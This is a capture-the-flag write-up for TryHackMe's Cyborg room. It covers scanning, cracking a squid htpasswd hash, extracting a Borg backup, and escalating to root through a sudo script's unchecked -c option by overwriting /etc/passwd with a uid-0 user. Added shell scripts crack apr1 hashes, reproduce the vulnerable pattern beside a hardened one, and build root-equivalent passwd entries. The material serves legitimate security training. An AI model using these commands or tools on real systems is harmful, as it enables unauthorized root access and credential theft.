TryHackMe | Cyborg Writeup
TryHackMe’s Cyborg room is an easy-level room involving public file access, hash cracking, backups, and privileged command execution to get root on the target machine. This writeup will go through each step needed to complete the room.
Task 1: Deploy the machine
1. Deploy the machine
We can deploy the target machine by clicking the green “Start Machine” button at the top of the task. Next, we need to connect to the TryHackMe network. I’m using a Kali virtual machine so I’ll connect using OpenVPN.
Task 2: Compromise the System
1. Scan the machine, how many ports are open?
We’ll scan the machine using nmap. We want the scan to report service versions and be very verbose, so we’ll use the -sV and -vv flags. The following will be the command we use:
nmap -sV -vv 10.10.221.75
We see a few open ports on the machine.
2. What service is running on port 22?
We can answer this question with the results of our nmap scan.
3. What service is running on port 80?
We can answer this question with the results of our nmap scan.
4. What is the user.txt flag?
Let’s go to the web server and see what’s there.
We’re led to the Apache default page. The source code doesn’t contain anything useful. Let’s do a Gobuster scan with the common.txt wordlist to look for any hidden directories. We’ll use the following command:
gobuster dir -u http://10.10.221.75 -w /usr/share/wordlists/dirb/common.txt
This results in a small list of directories.
The two interesting directories seem to be /admin and /etc. Let’s start with /etc.
There’s a directory called “squid”, let’s see what’s there.
We found a passwd file and a config file. The config file contains some authentication rules.
The passwd file has a username and password hash.
Let’s copy and paste the hash into a file called hash. Next we need to work out what kind of hash it is. Note that hashcat’s --show only prints entries that are already cracked in the potfile; it does not identify anything. The prefix of the hash already tells us the format, and hashcat 6.2 or newer can confirm it with the following command:
hashcat --identify hash
We can then start cracking the hash with mode 1600, which is the Apache $apr1$ MD5 format that htpasswd writes (and that squid’s basic-auth helper reads), against rockyou using the following command:
hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt
Within a few seconds we get our password.
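To make concrete what hashcat mode 1600 is actually computing, here is an added example of my own (not part of the room or of this writeup’s original steps): it recomputes the $apr1$ hash with openssl for each word in a small wordlist and compares the result, and maps common crypt-style prefixes to the hashcat mode that cracks them. The sample hash, the squid passwd line and the four-word wordlist in the demo are constructed for the example; it assumes the openssl command-line tool is installed.

```shell
#!/bin/sh
# Added example, not the room's code: check candidate passwords against an
# Apache/squid "$apr1$" htpasswd hash with openssl, i.e. what hashcat -m 1600 does.

# Map a crypt-style prefix to the hashcat mode that cracks it.
hashcat_mode_for() {
    case "$1" in
        '$apr1$'*) echo 1600 ;;   # Apache apr1 MD5 (htpasswd)
        '$1$'*)    echo 500  ;;   # md5crypt
        '$5$'*)    echo 7400 ;;   # sha256crypt
        '$6$'*)    echo 1800 ;;   # sha512crypt
        *)         echo unknown; return 1 ;;
    esac
}

# Recompute $apr1$<salt>$<hash> for one candidate and compare.
# Returns 0 on match, 1 on mismatch, 2 if the hash is not apr1, 3 if openssl is missing.
check_apr1() {
    hash="$1"; candidate="$2"
    case "$hash" in '$apr1$'*) ;; *) return 2 ;; esac
    command -v openssl >/dev/null 2>&1 || return 3
    # Fields of "$apr1$salt$digest" split on "$": "", apr1, salt, digest
    salt=$(printf '%s' "$hash" | cut -d'$' -f3)
    # -stdin keeps the candidate out of the process argument list
    recomputed=$(printf '%s\n' "$candidate" | openssl passwd -apr1 -salt "$salt" -stdin)
    [ "$recomputed" = "$hash" ]
}

# Try each word in a wordlist against one "user:hash" line from squid's passwd file.
# Prints "user:password" and returns 0 on success, 1 if the wordlist is exhausted.
crack_line() {
    line="$1"; wordlist="$2"
    user=${line%%:*}; hash=${line#*:}
    while IFS= read -r word || [ -n "$word" ]; do
        if check_apr1 "$hash" "$word"; then
            printf '%s:%s\n' "$user" "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Constructed demo: generate a hash for a known password, then recover it from
# a tiny wordlist. The salt, password and wordlist are made up for this example.
demo() {
    sample_hash=$(printf 'squidpass\n' | openssl passwd -apr1 -salt Zv1ZpGx3 -stdin)
    wl=$(mktemp)
    printf 'letmein\npassword\nsquidpass\nhunter2\n' > "$wl"
    echo "hashcat mode: $(hashcat_mode_for "$sample_hash")"
    crack_line "music_archive:$sample_hash" "$wl"
    rm -f "$wl"
}

case "${1-}" in --demo) demo ;; esac
```

Run it as `sh crack_apr1.sh --demo`; against a real squid passwd line you would pass the whole `user:$apr1$...` line and your wordlist to crack_line. This is orders of magnitude slower than hashcat because every candidate forks openssl, which is exactly why the tool exists, but it shows that the hash is just salt plus a fixed MD5 construction with no secret.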
We have a username and password, now we need a place to use it. Let’s go to the /admin directory.
We find a blog that’s been set up. There’s a page called admin.html which leads to a conversation between the admins.
It looks like the music_archive user we found earlier probably isn’t a user, but the name of a backup. There’s a dropdown tab that says archive, we can see a download button there which downloads a file called archive.tar.
When we extract the archive.tar file we are given a directory called “home”. Inside that is a chain of nested single directories (home/field/dev) ending in one called “final_archive”, which contains a handful of files.
The README file says that this is a backup repository and tells us to read the documentation.
Reading through the documentation, we can install Borg and extract the files. The repository is final_archive and the archive inside it is called music_archive, so we can extract it with the following command:
borg extract home/field/dev/final_archive::music_archive
We’re then asked for the repository passphrase, which is the password we cracked earlier. Borg extracts into the current directory, so when we look back in the home directory a new directory has appeared.
This new directory contains the home directory for Alex. The Desktop directory has a note congratulating us for getting this far, but the Documents directory has login credentials.
Let’s use these credentials to SSH into the target. Once logged in, we can list the files in this user’s directory and get the user flag.
With the user flag down, we can start looking for privilege escalation techniques.
5. What is the root.txt flag?
I find the easiest way to look for escalation vectors is to list our sudo permissions using “sudo -l”. This lists a script we can run as root.
If we look at the script’s permissions, our user owns the file but it isn’t writable. Because we own it, we can add write permission ourselves using the following command:
chmod +w /etc/mp3backups/backup.sh
At this point, having write permission allows us to do pretty much whatever we want to get root, since anything we put in the script runs as root under sudo. Before escalating though, let’s look at the script and see what it does.
The script’s too long for a screenshot, but it essentially finds mp3 files and backs them up. There is one thing that can be exploited for escalation though: it accepts a command via the -c option when it is run, and executes that command, unchecked, at the end of the script.
We can test this by executing the script and specifying a command. We’ll use the following to try it with the whoami command:
sudo /etc/mp3backups/backup.sh -c whoami
At the end of the output the script tells us that it is being run as root.
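The room’s backup.sh isn’t reproduced in this writeup, so the following is an added, reduced reconstruction of the pattern described above and not the room’s actual script: a -c option whose value is run unchecked at the end, beside a hardened version that only accepts named actions, plus the ownership check that would have caught the chmod +w trick. The function names and the “verify” action are my own.

```shell
#!/bin/sh
# Added example (a reconstruction, not the room's backup.sh): the dangerous
# "-c <command>" pattern next to a hardened version and an ownership check.

# Vulnerable pattern: whatever follows -c is run, unchecked, at the end of the
# script. Under "sudo" that is arbitrary command execution as root.
vulnerable_backup() {
    cmd=""
    OPTIND=1
    while getopts "c:" opt; do
        case "$opt" in
            c) cmd="$OPTARG" ;;
            *) return 64 ;;
        esac
    done
    # ... the real script would find and archive mp3 files here ...
    if [ -n "$cmd" ]; then
        $cmd                     # unquoted: word-split and executed as-is
    fi
}

# Hardened pattern: -c selects a named, fixed post-backup action; user input
# never becomes a command line. Unknown actions are refused with exit 2.
hardened_backup() {
    action=""
    OPTIND=1
    while getopts "c:" opt; do
        case "$opt" in
            c) action="$OPTARG" ;;
            *) return 64 ;;
        esac
    done
    case "$action" in
        "")      return 0 ;;
        verify)  echo "verifying backup"; return 0 ;;
        *)       echo "refusing unknown action: $action" >&2; return 2 ;;
    esac
}

# Ownership check a reviewer would run: a script a user may "sudo" must be
# owned by root and not writable by that user, or they can simply rewrite it
# (or, as above, chmod it because they own it). Returns 0 only if it is safe.
sudo_target_is_safe() {
    f="$1"
    [ -f "$f" ] || return 1
    owner_uid=$(stat -c %u "$f" 2>/dev/null || stat -f %u "$f")
    [ "$owner_uid" -eq 0 ] || return 1
    [ ! -w "$f" ] || return 1
    return 0
}
```

Running `vulnerable_backup -c whoami` prints whatever user the function runs as, which is exactly the behaviour the room’s script shows under sudo; `hardened_backup -c whoami` refuses with exit 2. The sudoers rule is only as strong as the file it points at, so the ownership check is the one to add to any privilege-escalation checklist.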
We could definitely use this to cat the root flag, but let’s have a little fun. Let’s use the script to replace /etc/passwd with a copy that contains an extra user with uid 0, so that we can log in as root. We’ll start by copying /etc/passwd to a file we can edit using the following command:
cp /etc/passwd file
This adds a file called “file” to our directory that contains the contents of /etc/passwd. We can then copy and paste the root entry to the bottom and replace the root name with ours. The copied line still has an “x” in the password field, which means the real hash lives in /etc/shadow; we replace that next so the password is checked against /etc/passwd itself.
Next we need to generate a password for our malicious user. We’ll use openssl to generate this using the following command:
openssl passwd -6 -salt 1 1
The -6 flag selects the SHA-512 crypt format, -salt 1 sets the salt to 1, and the final argument is the password, also 1. The resulting $6$... string goes in the second (password) field of our new entry, replacing the “x”.
Now we need to copy this file back to the current /etc/passwd file. We’ll do this using the backup script command we tested earlier:
sudo /etc/mp3backups/backup.sh -c 'cp file /etc/passwd'
After we run the command we can look in the /etc/passwd file to see that our user has been copied in.
With our user added, all we need to do is switch to the user with su and enter our password of 1.
We have root! Now all we need to do is go to the root directory and grab the flag.
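Putting the /etc/passwd steps together, here is an added example (not from the writeup) that builds the root-equivalent entry with the hash in the password field, appends it to a copy of the file, and verifies the result before anything is copied over the real /etc/passwd. The user name and hash are assumptions passed in as arguments; a real hash would come from openssl passwd -6 as above.

```shell
#!/bin/sh
# Added example, not the room's code: build and sanity-check a root-equivalent
# passwd entry on a copy of the file, never on /etc/passwd directly.

# Accept only a crypt(3)-style hash such as the "$6$..." output of
# "openssl passwd -6"; a bare "x" or an empty field would not let us log in.
is_crypt_hash() {
    case "$1" in
        '$6$'*'$'?* | '$5$'*'$'?* | '$1$'*'$'?* | '$y$'*'$'?*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print one passwd line: name, hash in field 2, uid 0 and gid 0 so the account is root.
make_root_entry() {
    name="$1"; hash="$2"
    is_crypt_hash "$hash" || return 1
    case "$name" in *[!a-z0-9_-]*|"") return 1 ;; esac   # simple, colon-free name
    printf '%s:%s:0:0:%s:/root:/bin/bash\n' "$name" "$hash" "$name"
}

# Copy $src to $dst with the new entry appended; refuse if the name already exists.
add_root_entry() {
    src="$1"; dst="$2"; name="$3"; hash="$4"
    entry=$(make_root_entry "$name" "$hash") || return 1
    if grep -q "^$name:" "$src"; then
        echo "user $name already present in $src" >&2; return 1
    fi
    cp "$src" "$dst" && printf '%s\n' "$entry" >> "$dst"
}

# Verify what was written: exactly one entry for the name, 7 fields, uid 0,
# gid 0 and a real hash (not "x" or empty) in the password field.
verify_root_entry() {
    file="$1"; name="$2"
    awk -F: -v n="$name" '
        $1 == n { found++; if (NF != 7 || $3 != 0 || $4 != 0 || $2 == "x" || $2 == "") bad++ }
        END { exit !(found == 1 && !bad) }' "$file"
}
```

Typical use on the target: `add_root_entry /etc/passwd file evil "$(openssl passwd -6 -salt 1 1)"`, then `verify_root_entry file evil` before handing `cp file /etc/passwd` to the sudo-run script. The verification step is what catches the two easy mistakes in this technique: leaving the “x” in place, or a stray colon or field that shifts the uid out of position.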
We’ve completed the room! We’ve gone from an nmap scan to root access using public file access, hash cracking, backups, and privileged command execution. I hope this writeup is helpful in completing the room! If you are still struggling please leave a comment or message me on Twitter and I will try my best to assist!
Lessons Learned:
- Always look at file permissions
- Borg backups can hold valuable information
Things I struggled with:
The backup program was the only thing I really had to figure out. I’ve never seen it before so having to look through the documentation took a few minutes. Other than that the room went smoothly.
Conclusion:
This room is pretty great! The vector for escalation gave a ton of variety. You could use the script’s own command option, or you could give yourself write access and do just about anything. I would recommend this room to someone who has done a few lessons and wants to do some beginner rooms.